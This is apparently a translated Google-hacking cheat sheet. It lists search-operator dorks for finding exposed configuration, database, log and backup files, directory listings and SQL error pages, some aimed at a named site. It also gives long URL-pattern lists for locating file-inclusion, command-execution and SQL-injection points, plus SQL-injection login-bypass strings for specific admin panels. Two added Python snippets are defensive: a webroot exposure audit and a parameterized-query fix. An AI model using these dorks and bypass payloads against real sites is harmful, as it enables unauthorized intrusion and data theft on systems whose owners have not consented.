Google Hacking

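intitle: searches for the given keyword in page titles; useful for finding web applications by a specific version name. allintitle also works.

inurl: searches for the given keyword in URLs; useful for constructing vulnerable-URL patterns of various forms. allinurl also works.

intext: searches for the given keyword in page body text; useful for getting straight to vulnerable pages and so on. allintext also works.

filetype: searches for files with the given extension, e.g. sql mdb txt bak backup ini zip rar doc xls ...

site: searches for the given content within one specific website

link: searches for pages that link to the given URL, e.g. link-exchange ("friendly link") pages

index of: used when looking for directory listings (directory traversal)

Some wildcards and operators that Google supports (use them selectively: the more precise the query, the fewer the results, so some targets are easily missed; these are not regular expressions, and the end goal is to find vulnerabilities):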

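+ forces a term to be included in the query
- excludes a term from the query
"" matches the text inside the double quotes exactly
. matches any single character
* matches any characters
| OR: several alternatives; a match on any one keyword is enough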

Example queries against a target site:

  • Directory listing (directory traversal) query:
    site:jiebao8.top intitle:index.of
  • Configuration file disclosure query:
    site:jiebao8.top ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini
  • Database file disclosure:
    site:jiebao8.top ext:sql | ext:dbf | ext:mdb
  • Log file disclosure:
    site:jiebao8.top ext:log
  • Backup and old files:
    site:jiebao8.top ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup
  • SQL errors:
    site:jiebao8.top intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:"Warning: mysql_query()" | intext:"Warning: pg_connect()"
  • Publicly exposed documents:
    site:jiebao8.top ext:doc | ext:docx | ext:odt | ext:pdf | ext:rtf | ext:sxw | ext:psw | ext:ppt | ext:pptx | ext:pps | ext:csv
  • phpinfo():
    site:jiebao8.top ext:php intitle:phpinfo "published by the PHP Group"
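
The same file classes can be checked from the server side before a crawler ever indexes them. The following is an added example, not code from the original page: it walks a document root and reports files whose extensions match the ext: groups above, plus directories with no index file. The allowlist, the index file names and the sample tree are assumptions.

```python
import os
import tempfile

# Extension groups copied from the ext: queries on this page.
EXPOSURE_CLASSES = {
    "config": {"xml", "conf", "cnf", "reg", "inf", "rdp", "cfg", "txt", "ora", "ini"},
    "database": {"sql", "dbf", "mdb"},
    "log": {"log"},
    "backup": {"bkf", "bkp", "bak", "old", "backup"},
}
ALLOWLIST = {"robots.txt", "sitemap.xml"}  # assumption: files meant to be public
INDEX_FILES = {"index.html", "index.htm", "index.php"}  # assumption: typical index names


def audit_webroot(root):
    """Return sorted (category, relative_path) findings for one document root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        # No index file: the directory is listable if autoindex is enabled.
        if not INDEX_FILES & {f.lower() for f in files}:
            findings.append(("no-index", rel_dir))
        for name in files:
            if name.lower() in ALLOWLIST:
                continue
            ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
            for category, exts in EXPOSURE_CLASSES.items():
                if ext in exts:
                    path = os.path.normpath(os.path.join(rel_dir, name))
                    findings.append((category, path))
    return sorted(findings)


def build_sample_webroot():
    """Constructed sample tree (not from the page) so the audit runs offline."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel in ("index.php", "robots.txt", "db.sql", "config.php.bak",
                "uploads/debug.log", "uploads/photo.jpg"):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("sample\n")
    return root


if __name__ == "__main__":
    for category, path in audit_webroot(build_sample_webroot()):
        print(f"{category:9s} {path}")
```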

Finding possible file inclusion and command execution vulnerabilities:

inurl:footer.inc.php?settings=
inurl:/pb_inc/admincenter/index.php?page=
inurl:/pnadmin/categories.inc.php?subpage=
inurl:/index.php??view=src/sistema/vistas/
inurl:/edit.php?em=file&filename=
inurl:/path_to_athena/athena.php?athena_dir= remote file inclusion
inurl:/path_to_qnews/q-news.php?id= remote file inclusion
inurl:/inc/backend_settings.php?cmd=
inurl:login.action Struts2-series command execution vulnerabilities
inurl:php?x= inurl:php?open=
inurl:php?visualizar= inurl:php?pagina=
inurl:php?inc= inurl:php?include_file=
inurl:php?page= inurl:php?pg=
inurl:php?show= inurl:php?cat=
inurl:php?file= inurl:php?path_local=
inurl:php?filnavn= inurl:php?HCL_path=
inurl:php?doc= inurl:php?appdir=
inurl:php?phpbb_root_dir= inurl:php?phpc_root_path=
inurl:php?path_pre= inurl:php?nic=
inurl:php?sec= inurl:php?content=
inurl:php?link= inurl:php?filename=
inurl:php?dir= inurl:php?document=
inurl:index.php?view= inurl:.php?locate=
inurl:.php?place= inurl:.php?layout=
inurl:.php?go= inurl:.php?catch=
inurl:.php?mode= inurl:.php?name=
inurl:.php?loc= inurl:.php?f=
inurl:.php?inf= inurl:.php?pg=
inurl:.php?load= inurl:.php?naam=
allinurl:php?page= allinurl:php?file=
inurl:php?x= inurl:admin.php?cal_dir=
inurl:php?include= inurl:php?nav=
inurl:.php?sel= inurl:php?p=
inurl:php?conf= inurl:php?prefix=
inurl:theme.php?THEME_DIR=
inurl:php?lvc_include_dir=
inurl:php?basepath= inurl:php?pm_path=
inurl:php?user_inc= inurl:php?cutepath=
inurl:php?fil_config= inurl:php?libpach=
inurl:php?pivot_path= inurl:php?rep=
inurl:php?conteudo= inurl:php?root=
inurl:php?configFile inurl:php?pageurl
inurl:php?inter_url inurl:php?url=
inurl:php?cmd= inurl:path.php?my=
inurl:php?xlink= inurl:php?to=
inurl:file.php?disp=

Injection in common CMSs:

inurl:article.php?ID= inurl:newsDetail.php?id=
inurl:show.php?id= inurl:newsone.php?id=
inurl:news.php?id= inurl:event.php?id=
inurl:preview.php?id= inurl:pages.php?id=
inurl:main.php?id= inurl:prod_detail.php?id=
inurl:view.php?id= inurl:product.php?id=
inurl:contact.php?Id= inurl:display_item.php?id=
inurl:item.php?id= inurl:view_items.php?id=
inurl:details.asp?id= inurl:profile.asp?id=
inurl:content.asp?id= inurl:display_item.asp?id=
inurl:view_detail.asp?ID= inurl:section.php?id=
inurl:theme.php?id= inurl:produit.php?id=
inurl:chappies.php?id= inurl:readnews.php?id=
inurl:rub.php?idr= inurl:pop.php?id=
inurl:person.php?id= inurl:read.php?id=
inurl:reagir.php?num= inurl:staff_id=
inurl:gallery.php?id= inurl:humor.php?id=
inurl:spr.php?id= inurl:gery.php?id=
inurl:profile_view.php?id=
inurl:fellows.php?id= inurl:ray.php?id=
inurl:productinfo.php?id=
inurl:file.php?cont= inurl:include.php?chapter=
inurl:principal.php?param=
inurl:general.php?menue= inurl:php?pref=
inurl:nota.php?chapter= inurl:php?str=
inurl:php?corpo= inurl:press.php?*
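
Besides the routine ways of finding injection points above, it is also worth searching for SQL statements directly in page titles or URLs; that may turn something up as well:
intitle: SQL keywords commonly used in injection, e.g. union, substr(), select and so on ...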

Bulk collection of "universal password" logins (a form of injection):

inurl:"wladmin/login.asp"
Username : '=' 'or'
Password : '=' 'or'

intext:POWERED BY Versatile Software Services default admin panel: /alogin.aspx
User ==> 'or''='
Pass ==> 'or''='

inurl:/media.php?hal=login
Email: '=''or'@gmail.com
Pass: '=''or'

intext:"Powered by : Best Webmasterz." default admin panel: /admin
User : '=' 'OR'
Pass : '=' 'OR'

intext:"Web Design and Maintenance by Cloud 5 Solutions" default admin panel: /admin/login.php
User : '=' 'OR'
Pass : '=' 'OR'

intext:"网站设计:火龙科技" default admin panel: /maintain/login.php
Username : '=' 'or'
Password : '=' 'or'

intext:"Powered by Moodyworld" default admin panel: /admin/
Username : '=' 'or'
Password : '=' 'or'
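
Why a value such as 'or''=' is accepted by these login pages, and the fix, shown as an added example that is not part of the original page: a login that concatenates input into its SQL text next to one that binds the input as parameters. The table, the account and the function names are constructed for illustration, and SQLite stands in for whatever database the real applications use.

```python
import sqlite3


def make_db():
    """Constructed sample database; table and account are made up."""
    db = sqlite3.connect(":memory:")
    # Plaintext password column only to mirror the legacy login pages;
    # real applications store salted password hashes.
    db.execute("CREATE TABLE admins (username TEXT, password TEXT)")
    db.execute("INSERT INTO admins VALUES ('admin', 's3cret-Pass')")
    return db


def where_clause(username, password):
    """The WHERE clause a concatenating login ends up sending."""
    return "username='" + username + "' AND password='" + password + "'"


def login_concat(db, username, password):
    """Vulnerable pattern: user input is pasted into the SQL text."""
    sql = "SELECT COUNT(*) FROM admins WHERE " + where_clause(username, password)
    return db.execute(sql).fetchone()[0] > 0


def login_param(db, username, password):
    """Hardened pattern: input is bound as data and never parsed as SQL."""
    sql = "SELECT COUNT(*) FROM admins WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchone()[0] > 0


if __name__ == "__main__":
    db = make_db()
    payload = "'or''='"  # the value listed on this page
    # The quotes close the string early, leaving a trailing ''='' that is always true.
    print(where_clause(payload, payload))
    print("concatenated: ", login_concat(db, payload, payload))  # True
    print("parameterized:", login_param(db, payload, payload))   # False
```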

site:*.tw inurl:/phpinfo.php
filetype:log "PHP Parse error"| "PHP Warning"
site:*.tw "id=" & intext:"Warning: mysql_fetch_array()"
site:*.jp "id=" & intext:"Warning: getimagesize()"
site:*.br "id=" & intext:"Warning: array_merge()"
site:*.tw "id=" & intext:"Warning: mysql_fetch_assoc()"
site:*.tw "id=" & intext:"Warning: mysql_result()"
site:*.jp "id=" & intext:"Warning: pg_exec()"
site:*.tw "id=" & intext:"Warning: require()"
inurl:/robots.txt site:*.*
